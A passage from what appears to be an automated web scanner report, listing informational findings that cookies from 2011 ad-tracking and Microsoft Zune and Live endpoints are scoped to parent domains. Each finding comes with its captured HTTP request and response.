<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A
...[SNIP]...

9.16. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: sess, uuid2 and anj (domain=.adnxs.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=105966 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ONY2QKBYMVD5FEFX2BR37K%3A20110628%3A2%7CXEXAP5HEBFET3JK734P3BR%3A20110628%3A1%7COBXRF4HH6JFXLDDVFSEQTM%3A20110628%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A4%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A3%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1%7CM5OOXYHITZA7XGIMSMOSWH%3A20110628%3A1; icu=ChIIvoIBEAoYASABKAEw3eiy8AQQ3eiy8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw))ByG5K)WgP%/zT#@:#8z-dUp)u]fwkNAf3WE5g%h%ksMZLow4G#V7_m:..iqG+b8]rH1.9<ktOde+dW=1iJ+Ar'n/Jw^sESpK8YPSkq')!p-gykgfN*Nur[3nJXya+Gmd486UM.Pm#'2N=*)ZaLb>@fJ1c#%)qL*oJoq0?!q:WwuOR=+o+0_Q_RWDtJ#gVm5)4<[`P/TTjh(s?Bw1EvKd+nb8sEFf=nnBmkoioWBp9)fb3AE#7d`e#P_F_muE!5Gb:-C6g<PYFc<c]BRSv#[Frf#FRzGk!_kjx1#$zVHqBa@YYuxdYm/8tto:XM?Mhe--/s09Y12!CeSFNR*/:>SPYuw2ftJID!)!vN!i[i8SR8swwOeo-'p%T42H(TOg!%w$1UJ_XK>nO:v#6isueX>9YlfuItK:x[60xq=gGzpNMNmpF29<N$IYh:bgLt^yAtpYT^qr(oscBbOe%XR:zc'v^/i0<VTlKRp8=O$.4-%bp#?B[XMsFivXc91M+qIjt:p8G(icTdxdu'snIh*.m*-EWc/SHSYmL!TMC1Lkob(Y*+(Zd*7D=h1z_kr>GJ_QDni<KP9l'uW7HPG'NJjK@Q9I<$k>A.rZvg.LgFR9kW0v?)_7A9)0xdK'c4#)-u'CsZGn?!Rjw6zWDal_u^`.CYU:LZdFchj/zZgN.(OA9BaccO@!`Mqu@Il%ADZf%UsNE[fpP#H_FUuTxRgh`3U$5p?43s#Jnb3cFRv<6TIN>fZHO>>LjO1l0#H.4>mB'pC0QO+gqS

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 11:22:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 11:22:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw))BAfzI)_c8i<lK#0Pn0I13%'hiiUjya]NePJuWIyt1!shO5+W]943^xjP-VZ[#v*7V*E?1lK7GeQXy%V*<X5zx]>^$7/zi5rMj5lo5_o3VW/ar7FCnRy^>>C7):gM6=r*i/#[pB=SYhiVs3JWW[xw:ivtn!CsFd61PLaw[[<DqkR$P4cs]+7urA@xYXfsUrZLg:tpzl70ZO)+geN%U1Z]J'4s!`?Xji#p[+yc]@WsXjaesPv3AskX__l1d??wa*+5K/WQa*kR$la!)<Cj'02sWS=WG$$j3>zgX=8EH4SDC8Z-/F4_'st9$`gbGQuBKVpBfqhdWwW5NR+e+3n_MG-%8`u(0RFuyB0hNX4N_h9>FBfLBgaO@U!Gj=YwrH[?*OaDXRY(Hwv_8g4-.'i+mf$4MZ5*Lu[ye43%+z'*x9d3!J]Y$0/b+I8#rbe^wI6`JMsCnw9mpb^XQti+CJ8i?LwtLX>!V1veMAp]t`?Io!t$TP6*l[-W63VEmULhD1hJwvnokI+S6BoE8JQ!2_3MZEa#HT#.Hl)7>`J58Yy*^ameq%S-i$R?fb>4xBPON5kf!5iIZ_YF(Z@q7ReF@c-%WXSTbieBIFN^Q7Ep91r0l#xmv*D<l<g)s3]t'#:x`sB80-wg+Rxj$'R8>9RF<xP+c1s!+(.c4w]6k*5mY:5<aZFNn7Z>)7d)0r7eYKtQxzBfVw0a:d$3Ns`+OctOR_)UV/oOWdU?CY_$S[Gl]_eLeT*cat-oSRicoEB.e1.C`tt-t'(UX_3nO6'[0_!>K(LiZ$plNwvB4`gM6t!v; path=/; expires=Tue, 04-Oct-2011 11:22:10 GMT; domain=.adnxs.com; HttpOnly
Location: http://cm.g.doubleclick.net/pixel?nid=appnexus1
Date: Wed, 06 Jul 2011 11:22:10 GMT
Content-Length: 0


9.17. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: sgm (domain=.interclick.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=9787d0d4-9d7b-4605-985d-7786f61ba68e HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; tpd=e20=1311819163224&e90=1309831963205&e50=1311819163964&e100=1309831963322

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323; domain=.interclick.com; expires=Tue, 06-Jul-2021 15:39:03 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Wed, 06 Jul 2011 15:39:02 GMT

GIF89a.............!.......,...........D..;

9.18. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: udm_0 (Domain=.revsci.net). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=K08784 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzENbgpj37xX1GlJO7a3wEU0cw3fRauBLbLa1hxIJOjDBlu18gnrOpSO3YjF0wMKV4ipvKrR3EogwrxHeNknjMH6SqUl22pXLAnFTV9qIeZlIZDHhyA0dnb6CwiAhxROt1YH8AVXH8382QGU/vgf98KjcLbIKBY60ENFOM7PSFI0WvHFebNnpD4olAZ8EKv0T8FyPx6DB7zblwlm/kfK0gsDM9HWwjjlpRArVpgdwu7hzWke/0YixMmmj5fRg6bBCx0SlvtbNmqCvsL9F+ThBet19A04HxTqU8b3nQhNZQGPBELixm9ZPLcb0nND8FSs5lEnuFkpXMu9XllQPRKily+32yrrvpvCQ5hdDDws3fRNKu9/VbXaqnftCbneHUzm69ZOZ0bU3GpkV37psEePMvYy5M9A1WMNQTLz3tsX5kfpLytLXUghOOqB/pQnGvlLrG3jR52bk5VGeRrE7ifz9y1n9uuhpUSHstnDVJAhckVdxAf0dhr+BzFueK6tJwy5o358GYKr4ry9mXUxrBhWdfeEgP0zm25Ih8ZAyh2cru1GAXaBOIKDNsQqAbhr4/x0AM3+BVLmPMMY12n3J+s4kc4awJtt7+FQgXo1NPLkMhjUdOAZcvjlggsTUMim918XskWnLFxgCEjyFn5gwnfpprqPLwri12NcuTcWLAKw8g0DdBvoeQgcr66oEHP6hTz2knqS5hfh0KTnj2uAkBw/WcyKvQ0K6mV+ujsqYMntEg3wHxat+ozLZkyYzVmCjTff6Yssgszk+Ln2nBOsMCNsu3grl8/mjf+JrnijOGn0fAJIpAgw5LSKbzNNFIEzolKLS9jsskM78jnojzRjl18iF6JsYngRg42f/OjDM/4XPdH/kiuKqMwT8neptYVN8gAeirQn83vTADE6vJdGN/m2j8Isv5DTBi+BvWFDALDwARgW2CrZCOjRaXOCH+mCDLkyaBfdswb3s8MQGf8OnLkXbgZxht6J0p
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=...[SNIP]...; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:00:43 GMT; Path=/
Last-Modified: Wed, 06 Jul 2011 14:00:43 GMT
Cache-Control: max-age=3600, private
Expires: Wed, 06 Jul 2011 15:00:43 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:00:43 GMT
Content-Length: 5681

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'K08784';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

9.19. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: C2, GUID and DBC (domain=advertising.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=msftie9drcpc_cs=1&betq=12682=433083 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; BASE=x7Q9ni23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Rbf0hn7jp9fCFhyHhGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGdwhGsOk0AZdUwkslKVCJkL3eHCKdue5CKYmQi/tQzZQgKe5KrRixKNB4Qxyr5mZC6aDHAlSZjdmk7zuiwXsX8/PTGAEVbwPw/pNOID7s5rzN9mUM7Zk/KlL!; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; F1=BQ+HN4EBAAAABAAAAUAAqBA; ROLL=U6APDjegFREW39A!; C2=swDFOFJwCob0FNysICwJoakBtKvAC0nhXLpwIg02FAHCdbdBwhwihXAcIwjmGAHCsGeBwhAQvaAcIQW4FAHCLppBwhAmhXAcIAY4FAHCdDmBwhAmoZAcIwtlGAHCEHoBwhwoyaAcIU1aGAHCBHoBwhgdeZAcIYZgGAHC1mpBwhgHXaAcI0soGAHCX8rBwhAG/aAcIYxvGAHCKopBwhQ2kXAcIUEoGAHCVGoBwhgh3ZAcRGQYmjohS0I9GsfzFU9shNwjkak1k6hA1WjBpD7gCw8jGp+tSLAr8ao60mvAz8qhr7qHGwyfGahh3iyKgW8q; GUID=MTMwOTk0ODk3MjsxOjE2dDUxa28wOTRrMGt1OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 15:39:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=XGIFOFJwCob0FSRsKiwubaActKvAC0nxILpwIg02FFGCdbdRhhwihXUYIwjmGFGCsGeRhhAQvaUYIQW4FFGCLppRhhAmhXUYIAY4FFGCdDmRhhAmoZUYIwtlGFGCEHoRhhwoyaUYIU1aGFGCBHoRhhgdeZUYIYZgGFGC1mpRhhgHXaUYI0soGFGCX8rRhhAG/aUYIYxvGFGCKopRhhQ2kXUYIUEoGFGCVGoRhhgh3ZUYRGQYmjoxD0I9GsfzFZ8shNwjka4xk6hA1WjRaD7gCw8jGu9tSLAr8a820mvAz8qxc7qHGwyfGfgh3iyKgWQn; domain=advertising.com; expires=Fri, 05-Jul-2013 15:39:03 GMT; path=/
Set-Cookie: GUID=MTMwOTk2Njc0MzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Fri, 05-Jul-2013 15:39:03 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Wed, 06 Jul 2011 16:39:03 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

9.20. https://live.zune.net/xweb/passport/bottomCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/bottomCB.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: EXPAllTREATMENTS, EXPCONTEXTHASZUNEPASS and lastCulture (domain=.zune.net). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/bottomCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7554
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:03 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:03 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:03 GMT
Connection: close
Content-Length: 4813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

9.21. https://live.zune.net/xweb/passport/rightCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/rightCB.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/rightCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: b2db948c-3538-4620-8179-ed9314b7b5a4,734190
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: BSID=YJGgishn1FDOIHzbSuUPMCAIAABGs7BB5jvMASqQqOHLGf5OFjo09weF0q3UOnx8; domain=.zune.net; path=/
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:01 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: z_dto_minfo=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: supportedTuner=Undefined; path=/
Set-Cookie: z_email=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:01 GMT; path=/
lx-svr: S804
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:01 GMT
Connection: close
Content-Length: 5984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

9.22. https://live.zune.net/xweb/passport/topCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/topCB.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/topCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7548
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:38:58 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:08:58 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:08:57 GMT
Connection: close
Content-Length: 4616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

9.23. http://m.adnxs.com/msftcookiehandler

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dE361C23374E642C998D8ABA7166A75EC HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIvoIBEAoYASABKAEw3eiy8AQQ3eiy8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw))ByDua)_c8i=$Q>#Pvc?C)P`v@4k0ctqVFM6=0:/(ks:NJow1z9ZK#?lOhm8V#v*7V*E?1lu=H(C*gZx2Ss=I?O/(z']Jx6M-Yi:*bjdCbN.KrKr`@`A[R[IBgy43C@cY2=dfT]IeCUBz69MK3ZUHfnG%ibT_/3-3m.rkh<amjMpWU-*-0Mb+H4y9%P6$Em=F5/V)pO[bZ]mCjKOvYhqRW`a$!QSz7rjRQ:*8M8)%:B[r1vowtVtRH]hjeJl_)9VrN=mFVq3sWLxB]G+VoQOkA7hBRzJ+=^m0Pe)kdaZvNipde7=7[-I#UWot%[$8UCate]WFQ/8*1FSM[7oDlL69<g*fJhpk`_4m05/^79%>*qB=kgR%FhNv(fz5jjk]##:H9`-6G'N]hl:'q6B!1TA>AYt/cEb:`C1Xr3UnD3@1NrztYAoL7ej0/!sPnUHG[>??u?v0KnVr6xKD6NXx@s!ixnTl5I*kZ[_6(`Q7Tq60)ra)#eyePji't21Q`i'CXwEAlUsslmO6c75hE^dm`4aV!iQpu)IMN+9HTTY7v^6]L'_?tY-2m)dTbp_>b8n$fnCKg(zP#*b#WTu.#2]xa(=4I+KTweO!TDHdQ:U-8yV2+e^BGZtf+oc5Gye`@h[wA>fUiG@vI3`o_5^kvHLg]PGyQZoWI>PnoCLnRwd%)7wxrg=H6J:vUQt'5*dU50F]3DuO^8CGS!l/e`A`<>>>BRHx`!u)fSLhN:qx-N5UHv_DRuWHU33e4.aTc:EU8iA1:ERF28?G[jOx/eR:8=g^)[wR/#

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 11:22:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 11:22:11 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Wed, 06 Jul 2011 11:22:11 GMT

GIF89a.............!.......,........@..L..;

9.24. https://msnia.login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://msnia.login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12632
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3040ca2c-de70-4a63-9d3d-1c68eed3a3d2; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: TK2IDSMLGN1A10 V: 0
Date: Wed, 06 Jul 2011 11:21:32 GMT
Connection: close

<!-- ServerInfo: TK2IDSMLGN1A10 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountr
...[SNIP]...

9.25. http://p.brilig.com/contact/bct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 11:21:55 GMT
Set-Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
Set-Cookie: bbid=AF3T0Zvr3k_eAKyttHO-2Y1-pj49skQ7XBb4DdQez_xwtEQ2i2wCqlfNJBcdkfO00ZvFh22PnRrg; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
Set-Cookie: tc="26:4499"; Version=1; Domain=.brilig.com; Max-Age=946080000; Expires=Fri, 28-Jun-2041 11:21:55 GMT
X-Brilig-D: D=6320
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 133

